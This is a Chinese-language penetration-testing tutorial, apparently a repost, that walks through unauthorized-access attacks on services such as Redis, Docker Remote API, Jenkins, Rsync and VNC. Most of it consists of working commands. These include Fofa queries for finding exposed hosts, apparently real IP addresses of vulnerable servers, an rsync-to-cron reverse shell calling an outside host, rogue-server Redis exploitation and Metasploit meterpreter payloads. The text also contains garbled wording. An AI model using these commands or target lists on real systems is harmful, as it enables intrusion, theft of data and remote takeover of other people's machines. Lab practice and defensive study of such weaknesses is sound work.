未授权访问毛病集合

Redis未授权访问毛病

进入vulhub目录启动靶机

1. 进⼊⽬录：cd /vulhub-master/redis/4-unacc
2. 启动：docker-compose up -d
3. 检查：docker ps

复制代码

在Kali上安装redis步伐

1. #安装redis
2. apt-get install redis
3. #redis链接
4. redis-cli -h 124.221.58.83 -p 6379
5. #redis常⻅命令
6. （1）查看信息：info
7. （2）删除所有数据库内容：flushall
8. （3）刷新数据库：flushdb
9. （4）看所有键：KEYS *，使⽤select num可以查看键值数据。
10. （5）设置变量：set test "whoami"
11. （6）config set dir dirpath 设置路径等配置
12. （7）config get dir/dbfilename 获取路径及数据配置信息
13. （8）save保存
14. （9）get 变量，查看变量名称

复制代码

可以直接连接执⾏命令且不需要认证阐明存在未授权访问毛病....下载以下攻击项⽬

1. git clone https://github.com/n0b0dyCN/redis-rogue-server

复制代码

使⽤⼯具执⾏以下命令获取⽬标的命令执⾏环境，交互时输⼊ i 键会获取Shell环境

1. python3 redis-rogue-server.py --rhost 124.221.58.83 --lhost 124.221.58.83

复制代码

第一次开启环境大概会报错 再执行一次就可以乐成进入

i是正向反弹 r是

MongoDB未授权访问毛病

在云服务器上执行以下命令搭建起MongoDB的毛病环境..

1. 拉取镜像：docker pull mongo
2. 启动容器：docker run -d -p 27017:27017 --name mongodb mongo
3. 查看容器：docker ps -a

复制代码

使⽤Nmap的插件脚本进⾏扫描...发现存在未授权访问毛病.

1. nmap -p 27017 --script mongodb-info 8.155.7.173

复制代码

也可实验使⽤MSF中的模块进⾏毛病测试....不需要认证即可直接连接...

1. use auxiliary/scanner/mongodb/mongodb_login
2. show options
3. set rhosts 172.16.3.243
4. set threads 15
5. exploit

复制代码

即存在未授权访问毛病使⽤Navicat进⾏连接...

Memcached未未授权访问毛病

下载Memcached步伐并执⾏以下命令..启动Memcached毛病环境

1. #Memcached程序下载
2. https://www.runoob.com/memcached/window-install-memcached.html
3. #执⾏命令
4. memcached.exe -d install
5. memcached.exe -d start

复制代码

要使用管理员身份运行cmd

使⽤Telnet步伐探测⽬标的11211端⼝...

1. #Telnet探测
2. telnet 172.16.3.243 11211
3. #操作命令
4. stats //查看memcache服务状态
5. stats items //查看所有items
6. stats cachedump 39 0 //获得缓存key
7. get :state:264861539228401373:261588 //通过key读取相应value获得实际缓存内容，造成敏感信息泄露

复制代码

使⽤Nmap步伐的脚本进⾏毛病扫描....

1. nmap -p 11211 --script memcached-info 172.16.3.243

复制代码

Zookeeper未授权访问毛病

使⽤以下Fofa语法搜索资产信息....

1. port="2181" && "Zookeeper" && country="US"

复制代码

在Kali中使⽤以下命令进⾏未授权访问毛病测试

1. echo envi | nc ip 35.162.110.1 2181

复制代码

可使⽤Zookeeper可视化管理⼯具进⾏连接....

1. #⼯具下载
2. https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip

复制代码

Jenkins未授权访问毛病

使⽤以下fofa语法进⾏产品搜索..

1. port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

复制代码

在打开的URL中...点击 Manage Jenkins --> Scritp Console 在执⾏以下命令...

1. #执⾏命令
2. println "whoami" .execute().text

复制代码

Jupyter NoteBook未授权访问毛病

通过以下fofa语法进⾏产品搜索....或使⽤vulhub启动靶场.

1. #fofa语法
2. "Jupyter Notebook" && port="8888" && "terminals"
3. #vulhub靶场
4. cd /vulhub/jupyter/notebook-rce
5. docker-compose up -d

复制代码

如果存在未授权访问毛病则直接访问 http://IP:8888 会直接跳到web管理界⾯，不需要 输⼊暗码。

从 New -> Terminal 新建⼀个终端，通过新建的终端可执⾏恣意命令

Elasticsearch未授权访问毛病

使⽤以下Fofa语法进⾏Elasticsearch产品搜索...

1. "Elasticsearch" && port="9200"

复制代码

存在未授权访问则直接进⼊到信息⻚⾯....不需要输⼊⽤户暗码登陆

可按照上⾯检察节点信息等

1. http://121.37.170.50:9200/version

复制代码

Kibana未授权访问毛病

使⽤以下Fofa语句搜索Kibana产品...并打开⻚⾯

1. "kibana" && port="5601"

复制代码

直接访问Kibana的⻚⾯且⽆需账号暗码可以登陆进⼊界⾯

Docker Remote API未授权访问毛病

使⽤以下Fofa语句对Docker产品进⾏搜索

1. port="2375" && "docker"

复制代码

直接使⽤欣赏器访问以下路径...

1. apt install docker-cli
3. http://ip:2375/version #查看版本信息
4. http://ip:2375/info #查看容器信息
5. #eg
6. http://35.86.135.136:2375/info
7. http://47.121.212.195:2375/info

复制代码

 使⽤-H参数连接⽬标主机的docker，使⽤ps命令查询⽬标系统运⾏的镜像

1. docker -H tcp://130.61.230.9:2375 ps
2. docker -H tcp://130.61.230.9:2375 version
3. docker -H tcp://130.61.230.9:2375 exec -it 1f4 /bin/bash
4. 操作思路：
5. docker pull 下载有Docker逃逸的容器下来
6. docker逃逸间接获取安装docker主机控制权限

复制代码

Kubernetes Api Server未授权访问毛病

使⽤以下Fofa语法搜索Kubernetes产品....

1. port="8080" && app="Kubernetes"

复制代码

在打开的⽹⻚中直接访问 8080 端⼝会返回可⽤的 API 列表

Hadoop未授权访问毛病

使⽤以下FoFA语法进⾏Hadoop产品的搜索

1. port="8088" && app="Hadoop"

复制代码

开启⻚⾯直接访问不经过⽤户暗码验证....

ActiveMQ未授权访问毛病

使⽤以下Fofa语法搜索产品...

1. body="ActiveMQ" && port="8161"

复制代码

ActiveMQ默认使⽤8161端⼝，默认⽤户名和暗码是 admin/admin ，在打开的⻚⾯输⼊

1. #⽤户登陆
2. http://43.255.231.186:8161/admin/
3. http://47.104.74.168:8161/admin/
4. http://123.60.156.191:8161/admin/

复制代码

admin admin 登录乐成

RabbitMQ未授权访问毛病

使⽤以下Fofa语法对RabbitMQ产品进⾏搜索...

1. port="15672"
2. port="15692"
3. port="25672"

复制代码

在打开的⻚⾯中可输⼊默认的账号和暗码进⾏登陆

1. 默认账号密码都是guest
2. http://x.x.x.x:15672
3. http://x.x.x.x:25672
4. http://x.x.x.x:15692
5. #eg
6. http://bzgx.yuyiying.com:15672/
7. http://47.94.4.84:15672
8. https://114.119.175.25:25672/#/

复制代码

Springboot Actuator未授权访问毛病

使⽤以下Fofa语句搜索资产并打开⻚⾯访问

1. #Fofa语法
2. icon_hash="116323821"
3. #eg
4. http://2.sureyong.com:9999/#/

复制代码

当 web 应⽤步伐出现 4xx、5xx 错误时体现类似以下⻚⾯就能确定当前 web 应⽤是使⽤了
springboot 框架....

拼接以下路径检察泄露的数据..

1. 访问/trace端点获取基本的 HTTP 请求跟踪信息（时间戳、HTTP 头等），如果存在登录⽤户的操作
2. 请求，可以伪造cookie进⾏登录。
3. 访问/env端点获取全部环境属性，由于 actuator 会监控站点 mysql、mangodb 之类的数据库服
4. 务，所以通过监控信息有时可以mysql、mangodb 数据库信息，如果数据库正好开放在公⽹，那么造
5. 成的危害是巨⼤的。
6. git 项⽬地址泄露，这个⼀般是在/health 路径，⽐如如下站点，访问其 health 路径可探测到站
7. 点 git 项⽬地址。

复制代码

FTP未授权访问毛病(匿名登陆)

对⽬标环境在资源管理器中⽤以下格式访问...如果该服务器开启了匿名登陆，则可直接进⾏内容检察

1. ftp://ip:port/

复制代码

本机开启ftp匿名访问前后对比
开启前

开启后

JBoss未授权访问毛病

使⽤以下语法搜索Jboss产品并打开其⻚⾯....

1. title="Welcome to JBoss"

复制代码

拼接以下路径且⽆需认证直接进⼊控制⻚⾯

1. #拼接路径
2. http://ip:port/jmx-console/
3. #eg
4. http://177.67.128.116//jmx-console/
5. http://117.193.144.108:8080/jmx-console/
6. http://119.8.196.187:8080/jmx-console/

复制代码

admin admin弱暗码登录

Ldap未授权访问毛病

使⽤以下Fofa语法搜索使⽤ldap服务的产品....并通过Ldapadmin可视化⼯具做连接验证

1. #Fofa语法
2. port="389"
3. #Ldapadmin⼯具
4. http://www.ldapadmin.org/download/index.html
5. https://sourceforge.net/projects/ldapadmin/

复制代码

启动⼯具并测试存在未授权的LDAP服务...乐成如下

连接⽬标LDAP服务并检察其内容

Rsync未授权访问毛病

在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场！！！

1. # Fofa语法
2. (port="873") && (is_honeypot=false && is_fraud=false)
3. # 启动靶场
4. cd vulhub/rsync/common
5. docker-compose up -d

复制代码

可使⽤Nmap扫描该端⼝是否开启服务，还可以使⽤Metasploit中关于允许匿名访问的rsync 扫描模块进⾏探测...

1. # nmap命令
2. nmap -p 873 --script rsync-list-modules ipaddress
3. # Metasploit模块
4. auxiliary/scanner/rsync/modules_list

复制代码

使⽤命令进⾏链接并读取⽂件....

1. rsync rsync://124.221.58.83:873/
2. rsync rsync://124.221.58.83:873/src/

复制代码

对系统中的敏感⽂件下载操纵.... /etc/passwd

1. rsync rsync://8.155.7.133:873/src/etc/passwd
2. rsync rsync://8.155.7.133:873/src/etc/passwd /var/www/html

复制代码

上传⽂件...如果有相应的jsp/asp/php环境可以写⼀句话以phpinfo为例...

1. echo "1" >1.txt
2. ls
3. rsync ./1.txt rsync://8.155.7.133:873/src/  
4. rsync rsync://8.155.7.133:873/src/

复制代码

反弹shell...在此可利⽤定时任务cron来反弹获取shell

1. 查看定时任务
2. rsync rsync://8.155.7.133/src/etc/crontab
3. 将定时任务下载下来
4. rsync rsync://8.155.7.133/src/etc/crontab /var/www/html
6. 创建shell文件
7. echo 1>1.txt
8.   
9. vim 1.txt
10.   
11. #!/bin/bash
12. /bin/bash -i >& /dev/tcp/114.132.92.17/8888 0>&1
14. mv 1.txt shell
15. cat shell
16. 授权shell文件
17. chmod 777 shell
18. 上传shell 至靶机
19. rsync -av ./shell rsync://8.155.7.133:873/src/etc/cron.hourly
20. 攻击机开启nc监听响应端口

复制代码

下载的定时任务文件

创建shell文件

上传shell至靶机

攻击机开启nc监听

VNC未授权访问毛病

使⽤以下语句在Fofa上进⾏资产网络

1. (port="5900") && (is_honeypot=false && is_fraud=false)

复制代码

可通过MSF中的模块进⾏检测与毛病利⽤

1. # VNC未授权检测
2. msf6 > use auxiliary/scanner/vnc/vnc_none_auth
3. msf6 auxiliary(scanner/vnc/vnc_none_auth) > show options
4. msf6 auxiliary(scanner/vnc/vnc_none_auth) > set rhosts 172.16.1.1-254
5. msf6 auxiliary(scanner/vnc/vnc_none_auth) > set threads 100
6. msf6 auxiliary(scanner/vnc/vnc_none_auth) > run
7. # VNC密码爆破
8. msf6 > use auxiliary/scanner/vnc/vnc_login
9. msf6 auxiliary(scanner/vnc/vnc_login) > set rhosts 172.16.1.200
10. msf6 auxiliary(scanner/vnc/vnc_login) > set blank_passwords true //弱密码爆
11. 破
12. msf6 auxiliary(scanner/vnc/vnc_login) > run
13. # 加载攻击模块
14. msf6 exploit(windows/smb/ms08_067_netapi) > use exploit/windows/smb/ms08_0
15. 67_netapi
16. msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterprete
17. r/reverse_tcp
18. msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 172.16.1.200
19. msf6 exploit(windows/smb/ms08_067_netapi) > set lhost 172.16.1.10
20. msf6 exploit(windows/smb/ms08_067_netapi) > set target 34
21. msf6 exploit(windows/smb/ms08_067_netapi) > exploit
22. 获取会话后，直接run vnc可控制远程虚拟机
23. # 直接控制远程机器
24. msf6 > use exploit/multi/handler
25. msf6 exploit(multi/handler) > set payload windows/vncinject/reverse_tcp
26. msf6 exploit(multi/handler) > set lhost 172.16.1.200
27. msf6 exploit(multi/handler) > set lport 4466
28. msf6 exploit(multi/handler) > exploit

复制代码

VNC链接验证

1. vncviewer ipaddress

复制代码

Dubbo未授权访问毛病

使⽤以下语句在Fofa上进⾏资产网络

1. (app="APACHE-dubbo") && (is_honeypot=false && is_fraud=false)

复制代码

使⽤Telnet步伐直接进⾏链接测试

1. telent IP port

复制代码

NSF共享⽬录未授权访问

使⽤以下语句在Fofa上进⾏资产网络

1. "nfs"

复制代码

执⾏命令进⾏毛病复现

1. #安装nfs客户端
2. apt install nfs-common
3. #查看nfs服务器上的共享⽬录
4. showmount -e 192.168.126.130
5. #挂载相应共享⽬录到本地
6. mount -t nfs 192.168.126.130:/grdata /mnt
7. #卸载⽬录
8. umount /mnt

复制代码

Druid未授权访问毛病

步调⼀：使⽤以下语句在Fofa与Google上进⾏资产网络....

1. # Fofa
2. title="Druid Stat Index"
3. # PHPINFO⻚⾯
4. inurl:phpinfo.php intitle:phpinfo()
5. info.php test.php
7. # Druid未授权访问
8. inurl:"druid/index.html" intitle:"Druid Stat Index"

复制代码

对访问到的站点检察

Druid批量扫描脚本...

1. https://github.com/MzzdToT/CVE-2021-34045

复制代码

CouchDB未授权访问

使⽤以下语句在Fofa上进⾏资产网络....或开启Vulhub靶场进⾏操纵

1. # 搜索语法
2. (port="5984") && (is_honeypot=false && is_fraud=false)
3. # Vulhub靶场
4. cd /vulhub/couchdb/CVE-2017-12636
5. docker-compose up -d

复制代码

执⾏未授权访问测试命令

1. curl 192.168.1.4:5984
2. curl 192.168.1.4:5984/_config

复制代码

反弹Shell参考

1. https://blog.csdn.net/qq_45746681/article/details/108933389

复制代码

RTSP

1. (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

复制代码

1. rtsp://admin:admin@192.168.1.1:554/cam/realmonitor?channel=2&subtype=1

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。